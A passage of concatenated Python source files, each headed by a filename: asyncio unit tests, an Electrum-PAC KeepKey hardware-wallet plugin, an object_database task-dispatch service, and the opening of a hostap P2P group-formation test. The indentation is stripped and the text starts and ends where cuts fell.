self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
if __name__ == '__main__':
unittest.main()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_pac.util import bfh, bh2u, UserCancelled
from electrum_pac.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum_pac import constants
from electrum_pac.i18n import _
from electrum_pac.plugin import BasePlugin
from electrum_pac.transaction import deserialize, Transaction
from electrum_pac.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_pac.wallet import Standard_Wallet
from electrum_pac.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "PacTestnet" if constants.net.TESTNET else "Pac"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
Task.py
|
# Copyright 2019 Braxton Mckee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import traceback
import threading
import time
from object_database.web import cells as cells
from object_database.service_manager.ServiceSchema import service_schema
from object_database.service_manager.ServiceBase import ServiceBase
from object_database import Schema, Indexed, Index, core_schema
from object_database.view import revisionConflictRetry, DisconnectedException
from typed_python import OneOf, Alternative, ConstDict
task_schema = Schema("core.task")
# how many times our worker can disconnect in a row before we get marked 'Failed'
MAX_TIMES_FAILED = 10
@task_schema.define
class ResourceScope:
pass
class TaskContext(object):
"""Placeholder for information about the current running task environment passed into tasks."""
def __init__(self, db, storageRoot, codebase):
self.db = db
self.storageRoot = storageRoot
self.codebase = codebase
class RunningTask(object):
"""Base class for a running Task's state. This must be serializable."""
def __init__(self):
pass
def execute(self, taskContext, subtaskResults):
"""Step the task forward. Should return a TaskStatusResult. If we asked for results, they are passed back in subtaskResults"""
raise NotImplementedError()
class TaskExecutor(object):
"""Base class for all Tasks. """
def instantiate(self):
"""Return a RunningTask that represents us."""
raise NotImplementedError()
class RunningFunctionTask(RunningTask):
def __init__(self, f):
self.f = f
def execute(self, taskContext, subtaskResults):
return TaskStatusResult.Finished(result=self.f(taskContext.db))
class FunctionTask(TaskExecutor):
"""A simple task that just runs a single function."""
def __init__(self, f):
self.f = f
def instantiate(self):
return RunningFunctionTask(self.f)
TaskStatusResult = Alternative(
'TaskStatusResult',
Finished={'result': object},
Subtasks={'subtasks': ConstDict(str, TaskExecutor)},
SleepUntil={'wakeup_timestamp': float}
)
TaskResult = Alternative(
"TaskResult",
Result={'result': object},
Error={'error': str},
Failure={}
)
@task_schema.define
class Task:
service = Indexed(service_schema.Service)
service_and_finished = Index('service', 'finished')
resourceScope = Indexed(OneOf(None, ResourceScope))
executor = TaskExecutor
parent = OneOf(None, task_schema.Task)
instance = OneOf(None, object)
time_elapsed = float
result = OneOf(None, TaskResult)
finished = Indexed(OneOf(None, True))
finished_timestamp = OneOf(None, float)
@staticmethod
def Create(service, executor):
return TaskStatus(
task=Task(
service=service,
executor=executor
),
state="Unassigned"
).task
@task_schema.define
class TaskStatus:
task = Indexed(Task)
parentStatus = OneOf(None, task_schema.TaskStatus)
resourceScope = Indexed(OneOf(None, ResourceScope))
state = Indexed(OneOf("Unassigned", "Assigned", "Working", "Sleeping", "WaitForSubtasks", "DoneCalculating", "Collected"))
wakeup_timestamp = OneOf(None, float)
subtasks = OneOf(None, ConstDict(str, task_schema.TaskStatus))
subtasks_completed = int
times_failed = int
worker = Indexed(OneOf(None, task_schema.TaskWorker))
@revisionConflictRetry
def finish(self, db, result, elapsed=0.0):
with db.transaction():
self._finish(result, elapsed)
def _finish(self, result, elapsed=0.0):
self.task.result = result
self.task.time_elapsed += elapsed
self.worker = None
self.state = "DoneCalculating"
@task_schema.define
class TaskWorker:
connection = Indexed(core_schema.Connection)
hasTask = Indexed(bool)
class TaskService(ServiceBase):
coresUsed = 1
gbRamUsed = 8
def initialize(self):
self.db.subscribeToNone(TaskWorker)
self.logger = logging.getLogger(__name__)
with self.db.transaction():
self.workerObject = TaskWorker(connection=self.db.connectionObject, hasTask=False)
self.db.subscribeToIndex(task_schema.TaskStatus, worker=self.workerObject)
def doWork(self, shouldStop):
while not shouldStop.is_set():
with self.db.view():
tasks = TaskStatus.lookupAll(worker=self.workerObject)
if not tasks:
time.sleep(.01)
else:
if len(tasks) > 1:
raise Exception("Expected only one task to be allocated to us.")
self.doTask(tasks[0])
with self.db.transaction():
self.workerObject.hasTask = False
@staticmethod
def serviceDisplay(serviceObject, instance=None, objType=None, queryArgs=None):
cells.ensureSubscribedType(TaskStatus, lazy=True)
return cells.Card(
cells.Subscribed(lambda: cells.Text("Total Tasks: %s" % len(TaskStatus.lookupAll()))) +
cells.Subscribed(lambda: cells.Text("Working Tasks: %s" % len(TaskStatus.lookupAll(state='Working')))) +
cells.Subscribed(lambda: cells.Text("WaitingForSubtasks Tasks: %s" % len(TaskStatus.lookupAll(state='WaitForSubtasks')))) +
cells.Subscribed(lambda: cells.Text("Unassigned Tasks: %s" % len(TaskStatus.lookupAll(state='Unassigned'))))
)
def doTask(self, taskStatus):
with self.db.view():
task = taskStatus.task
self.db.subscribeToObject(task)
t0 = None
try:
with self.db.transaction():
assert taskStatus.state == "Assigned", taskStatus.state
taskStatus.state = "Working"
task = taskStatus.task
codebase = taskStatus.task.service.codebase
subtaskStatuses = taskStatus.subtasks
taskStatus.subtasks = {}
taskStatus.wakeup_timestamp = None
typedPythonCodebase = codebase.instantiate()
self.db.setSerializationContext(typedPythonCodebase.serializationContext)
if subtaskStatuses:
self.db.subscribeToObjects(list(subtaskStatuses.values()))
with self.db.view():
subtasks = {name: status.task for name, status in subtaskStatuses.items()}
self.db.subscribeToObjects(list(subtasks.values()))
with self.db.transaction():
for r in subtaskStatuses.values():
assert r.state == "Collected"
subtask_results = {name: t.result for name, t in subtasks.items()}
for t in subtasks.values():
t.delete()
for s in subtaskStatuses.values():
logging.info("Deleting subtask status %s", s)
s.delete()
else:
subtask_results = None
with self.db.transaction():
executor = taskStatus.task.executor
instanceState = taskStatus.task.instance
if instanceState is None:
instanceState = executor.instantiate()
t0 = time.time()
context = TaskContext(self.db, self.runtimeConfig.serviceTemporaryStorageRoot, codebase)
execResult = instanceState.execute(context, subtask_results)
logging.info("Executed task %s with state %s producing result %s", task, instanceState, execResult)
assert isinstance(execResult, TaskStatusResult), execResult
if execResult.matches.Finished:
taskStatus.finish(self.db, TaskResult.Result(result=execResult.result), time.time() - t0)
if execResult.matches.Subtasks:
with self.db.transaction():
taskStatus.state = "WaitForSubtasks"
taskStatus.worker = None
# create the new child tasks
newTaskStatuses = {}
for taskName, subtaskExecutor in execResult.subtasks.items():
newTaskStatuses[taskName] = TaskStatus(
task=Task(
service=task.service,
resourceScope=task.resourceScope,
executor=subtaskExecutor,
parent=task
),
parentStatus=taskStatus,
resourceScope=task.resourceScope,
state="Unassigned",
worker=None
)
logging.info("Subtask %s depends on %s", task, [str(ts.task) + "/" + str(ts) for ts in newTaskStatuses.values()])
taskStatus.subtasks = newTaskStatuses
if execResult.matches.SleepUntil:
with self.db.transaction():
taskStatus.state = "Sleeping"
taskStatus.worker = None
taskStatus.wakeup_timestamp = execResult.wakeup_timestamp
except Exception:
self.logger.error("Task %s failed with exception:\n%s", task, traceback.format_exc())
taskStatus.finish(self.db, TaskResult.Error(error=traceback.format_exc()), time.time() - t0 if t0 is not None else 0.0)
class TaskDispatchService(ServiceBase):
coresUsed = 1
gbRamUsed = 4
def initialize(self):
self.logger = logging.getLogger(__name__)
self.db.subscribeToType(task_schema.TaskStatus)
self.db.subscribeToType(task_schema.TaskWorker)
def checkForDeadWorkers(self):
toDelete = []
with self.db.view():
for w in TaskWorker.lookupAll():
if not w.connection.exists():
toDelete.append(w)
@revisionConflictRetry
def deleteWorker(w):
while True:
with self.db.view():
taskStatuses = TaskStatus.lookupAll(worker=w)
tasks = [ts.task for ts in taskStatuses]
if not taskStatuses:
return
self.db.subscribeToObjects(tasks)
with self.db.transaction():
for taskStatus in taskStatuses:
taskStatus.times_failed += 1
if taskStatus.times_failed > MAX_TIMES_FAILED:
taskStatus._finish(TaskResult.Failure(), 0.0)
else:
taskStatus.state = "Unassigned"
taskStatus.worker = None
for d in toDelete:
deleteWorker(d)
def doWork(self, shouldStop):
def checkForDeadWorkersLoop():
while not shouldStop.is_set():
try:
self.checkForDeadWorkers()
time.sleep(5.0)
except DisconnectedException:
return
except Exception:
self.logger.error("Unexpected exception in TaskDispatchService: %s", traceback.format_exc())
def assignLoop():
while not shouldStop.is_set():
try:
if self.assignWork():
shouldStop.wait(timeout=.01)
except DisconnectedException:
return
except Exception:
self.logger.error("Unexpected exception in TaskDispatchService: %s", traceback.format_exc())
def collectLoop():
while not shouldStop.is_set():
try:
if self.collectResults():
shouldStop.wait(timeout=.01)
except DisconnectedException:
return
except Exception:
self.logger.error("Unexpected exception in TaskDispatchService: %s", traceback.format_exc())
threads = [threading.Thread(target=t) for t in [checkForDeadWorkersLoop, assignLoop, collectLoop]]
for t in threads:
t.start()
for t in threads:
t.join()
@revisionConflictRetry
def assignWork(self):
count = 0
with self.db.view():
workers = list(TaskWorker.lookupAll(hasTask=False))
tasks = list(TaskStatus.lookupAll(state='Unassigned'))
with self.db.transaction():
while workers and tasks:
worker = workers.pop(0)
task = tasks.pop(0)
worker.hasTask = True
task.worker = worker
task.state = "Assigned"
count += 1
return count
def collectResults(self, maxPerTransaction=30):
count = 0
with self.db.view():
statuses = list(TaskStatus.lookupAll(state="DoneCalculating"))[:maxPerTransaction]
while count < 30 and statuses:
self.collectTask(statuses.pop(0))
count += 1
return count
@revisionConflictRetry
def collectTask(self, taskStatus):
with self.db.view():
task = taskStatus.task
state = taskStatus.state
parentStatus = taskStatus.parentStatus
if state == "DoneCalculating" and parentStatus is None:
self.db.subscribeToObject(task)
with self.db.transaction():
# this is a root-level task. Mark it complete so it can be collected
# by whoever kicked it off.
task.finished = True
task.finished_timestamp = time.time()
logging.info("deleting root status %s", taskStatus)
taskStatus.delete()
elif state == "DoneCalculating":
with self.db.transaction():
parentStatus.subtasks_completed = parentStatus.subtasks_completed + 1
if len(parentStatus.subtasks) == parentStatus.subtasks_completed:
parentStatus.state = "Unassigned"
parentStatus.times_failed = 0
taskStatus.state = "Collected"
|
test_p2p_grpform.py
|
# P2P group formation test cases
# Copyright (c) 2013-2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import time
import threading
import Queue
import os
import hostapd
import hwsim_utils
import utils
def check_grpform_results(i_res, r_res):
if i_res['result'] != 'success' or r_res['result'] != 'success':
raise Exception("Failed group formation")
if i_res['ssid'] != r_res['ssid']:
raise Exception("SSID mismatch")
if i_res['freq'] != r_res['freq']:
raise Exception("freq mismatch")
if 'go_neg_freq' in r_res and i_res['go_neg_freq'] != r_res['go_neg_freq']:
raise Exception("go_neg_freq mismatch")
if i_res['freq'] != i_res['go_neg_freq']:
raise Exception("freq/go_neg_freq mismatch")
if i_res['role'] != i_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if 'go_neg_role' in r_res and r_res['role'] != r_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if i_res['go_dev_addr'] != r_res['go_dev_addr']:
raise Exception("GO Device Address mismatch")
def go_neg_init(i_dev, r_dev, pin, i_method, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
try:
